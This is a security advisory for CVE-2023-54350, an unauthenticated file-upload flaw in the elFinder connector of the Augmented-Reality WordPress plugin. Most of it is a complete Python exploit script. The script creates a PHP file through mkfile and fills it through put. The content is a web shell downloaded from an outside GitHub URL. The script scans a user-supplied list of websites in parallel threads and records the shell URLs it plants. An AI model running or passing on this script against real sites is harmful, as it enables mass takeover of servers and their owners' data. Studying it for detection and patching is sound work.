CVE-2023-54350

An unauthenticated attacker can send POST requests to the `connector.minimal.php` endpoint. By using the `mkfile` command, the attacker can create a new PHP file within the `file_manager` directory. Subsequently, the `put` command can be used to upload malicious PHP code into the newly created file, enabling remote code execution on the server [ref_id=1].

The vulnerability resides within the elFinder connector component of the Augmented-Reality WordPress plugin, specifically in the `connector.minimal.php` file. The exploit targets the `mkfile` and `put` commands processed by this connector to achieve arbitrary file upload and execution within the `file_manager` directory [ref_id=1].

The provided bundle does not contain information about a patch or specific remediation steps. Therefore, the advisory does not specify how the vulnerability is fixed. Users are advised to consult the vendor for the latest security updates and mitigation strategies.

import requests as req import json import sys import random import uuid import urllib.parse import urllib3 from multiprocessing.dummy import Pool as ThreadPool urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) filename="{}.php".format(str(uuid.uuid4())[:8]) proxies = {} #proxies = #  'http': 'http://127.0.0.1:8080', #  'https': 'http://127.0.0.1:8080', phash = "l1_Lw" r=req.Session() user_agent={ "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" } r.headers.update(user_agent) def is_json(myjson):   try:     json_object = json.loads(myjson)   except ValueError as e:     return False   return True def mkfile(target):     data={"cmd" : "mkfile", "target":phash, "name":filename}     resp=r.post(target, data=data)     respon = resp.text     if resp.status_code == 200 and is_json(respon):         resp_json=respon.replace(r"\/", "").replace("\", "")         resp_json=json.loads(resp_json)         return resp_json["added"][0]["hash"]     else:         return False def put(target, hash):     content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)     content=content.text     data={"cmd" : "put", "target":hash, "content": content}     respon=r.post(target, data=data, proxies=proxies, verify=False)     if respon.status_code == 200:       return True def exploit(target):     try:         vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)         respon=r.get(vuln_path, proxies=proxies, verify=False).status_code         if respon != 200:           print("[FAIL] {}".format(target))           return         hash=mkfile(vuln_path)         if hash == False:           print("[FAIL] {}".format(target))           return         if put(vuln_path, hash):           shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)           status = r.get(shell_path, proxies=proxies, verify=False).status_code           if status==200 :               with open("result.txt", "a") as newline:                   newline.write("{}\n".format(shell_path))                   newline.close()               print("[OK] {}".format(shell_path))               return           else:               print("[FAIL] {}".format(target))               return         else:           print("[FAIL] {}".format(target))           return     except req.exceptions.SSLError:           print("[FAIL] {}".format(target))           return     except req.exceptions.ConnectionError:           print("[FAIL] {}".format(target))           return def main():     threads = input("[?] Threads > ")     list_file = input("[?] List websites file > ")     print("[!] all result saved in result.txt")     with open(list_file, "r") as file:         lines = [line.rstrip() for line in file]         th = ThreadPool(int(threads))         th.map(exploit, lines) if __name__ == "__main__":     main() [ref_id=1]